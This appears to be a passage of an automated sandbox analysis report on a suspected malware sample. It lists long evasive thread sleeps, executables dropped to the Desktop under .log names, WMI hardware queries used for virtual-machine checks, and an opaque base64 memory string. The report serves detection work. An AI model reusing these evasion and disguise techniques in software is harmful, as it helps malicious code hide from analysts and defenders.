                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 596906
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 596797
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 596672
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 596562
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 596447
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 596344
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 596222
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 596094
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 595981
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 595875
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 595766
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 595656
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 595547
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 595437
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 595328
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 595219
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 595109
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 594983
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 594795
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 594532
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 594110
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 593983
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 593872
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 300000
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2827Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3042Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2783
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3158
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2951
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2441
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWindow / User API: threadDelayed 4283
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWindow / User API: threadDelayed 5474
                                    Source: C:\SavesHost\Blockbrowser.exeDropped PE file which has not been started: C:\Users\user\Desktop\xJfQbpmT.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeDropped PE file which has not been started: C:\Users\user\Desktop\UQJnCrwb.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeDropped PE file which has not been started: C:\Users\user\Desktop\YYGwXJrX.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeDropped PE file which has not been started: C:\Users\user\Desktop\NzeXyGEM.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeDropped PE file which has not been started: C:\Users\user\Desktop\SnwWbCTA.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeDropped PE file which has not been started: C:\Users\user\Desktop\lpgkkzWs.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeDropped PE file which has not been started: C:\Users\user\Desktop\KxrpdWzR.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeDropped PE file which has not been started: C:\Users\user\Desktop\lxQDOiwy.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeDropped PE file which has not been started: C:\Users\user\Desktop\LipXSOru.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeDropped PE file which has not been started: C:\Users\user\Desktop\sCWCXWYE.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeDropped PE file which has not been started: C:\Users\user\Desktop\ezcDmTCJ.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeDropped PE file which has not been started: C:\Users\user\Desktop\XnIOiRzu.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeDropped PE file which has not been started: C:\Users\user\Desktop\JRXzWseY.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeDropped PE file which has not been started: C:\Users\user\Desktop\unCSekjx.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeDropped PE file which has not been started: C:\Users\user\Desktop\lgJkAMCv.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeDropped PE file which has not been started: C:\Users\user\Desktop\hHZMHlwF.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeDropped PE file which has not been started: C:\Users\user\Desktop\TcFfQdBd.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeDropped PE file which has not been started: C:\Users\user\Desktop\UgLFMzEy.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeDropped PE file which has not been started: C:\Users\user\Desktop\OvRyOCaQ.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeDropped PE file which has not been started: C:\Users\user\Desktop\JulPgBvw.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeDropped PE file which has not been started: C:\Users\user\Desktop\apvwEADp.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeDropped PE file which has not been started: C:\Users\user\Desktop\uaYsybMf.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeDropped PE file which has not been started: C:\Users\user\Desktop\wdLbULQa.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeDropped PE file which has not been started: C:\Users\user\Desktop\ouZtCEeJ.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeDropped PE file which has not been started: C:\Users\user\Desktop\ziDjmQZr.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeDropped PE file which has not been started: C:\Users\user\Desktop\eOeVwbKg.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeDropped PE file which has not been started: C:\Users\user\Desktop\bGNUAWQL.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeDropped PE file which has not been started: C:\Users\user\Desktop\IxKHLBgB.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeDropped PE file which has not been started: C:\Users\user\Desktop\slPjJBeC.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeDropped PE file which has not been started: C:\Users\user\Desktop\bdzEpOzn.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeDropped PE file which has not been started: C:\Users\user\Desktop\OwFfUGTH.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZEamenMP.logJump to dropped file
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeDropped PE file which has not been started: C:\Users\user\Desktop\bVPmLfYi.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exeDropped PE file which has not been started: C:\Users\user\Desktop\Opngnglp.logJump to dropped file
                                    Source: C:\SavesHost\Blockbrowser.exe TID: 2180Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep count: 2827 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7488Thread sleep count: 3042 > 30Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356Thread sleep count: 2783 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep time: -2767011611056431s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep count: 3158 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688Thread sleep time: -2767011611056431s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep count: 2951 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692Thread sleep time: -2767011611056431s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492Thread sleep count: 2441 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep time: -2767011611056431s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 7944Thread sleep time: -30000s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -37815825351104557s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -600000s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -599875s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -599762s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -599651s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -599547s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -599438s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -599328s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -599216s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8152Thread sleep time: -10800000s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -599103s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -598989s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -598860s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -598750s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -598641s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -598516s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -598404s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -598297s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -598187s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -598078s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -597969s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -597860s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -597735s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -597610s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -597485s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -597360s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -597235s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -597123s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -597013s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -596906s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -596797s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -596672s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -596562s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -596447s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -596344s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -596222s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -596094s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -595981s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -595875s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -595766s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -595656s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -595547s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -595437s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -595328s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -595219s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -595109s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -594983s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -594795s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -594532s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -594110s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -593983s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8168Thread sleep time: -593872s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe TID: 8152Thread sleep time: -300000s >= -30000s
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\SavesHost\Blockbrowser.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_007DA69B
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_007EC220
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007FB348 FindFirstFileExA,0_2_007FB348
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007EE6A3 VirtualQuery,GetSystemInfo,0_2_007EE6A3
                                    Source: C:\SavesHost\Blockbrowser.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 30000
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 922337203685477
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 600000
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 599875
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 599762
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 599651
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 599547
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 599438
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 599328
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 599216
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 3600000
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 599103
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 598989
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 598860
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 598750
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 598641
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 598516
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 598404
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 598297
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 598187
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 598078
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 597969
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 597860
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 597735
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 597610
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 597485
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 597360
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 597235
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 597123
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 597013
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 596906
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 596797
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 596672
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 596562
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 596447
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 596344
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 596222
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 596094
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 595981
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 595875
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 595766
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 595656
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 595547
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 595437
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 595328
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 595219
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 595109
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 594983
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 594795
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 594532
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 594110
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 593983
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 593872
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeThread delayed: delay time: 300000
                                    Source: 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3563942137.000000001373E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GutqY27hRQA2HRqk9XIExmKMsNdTTdslIFGcvw83b49BKpNsGhgBOjS2Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP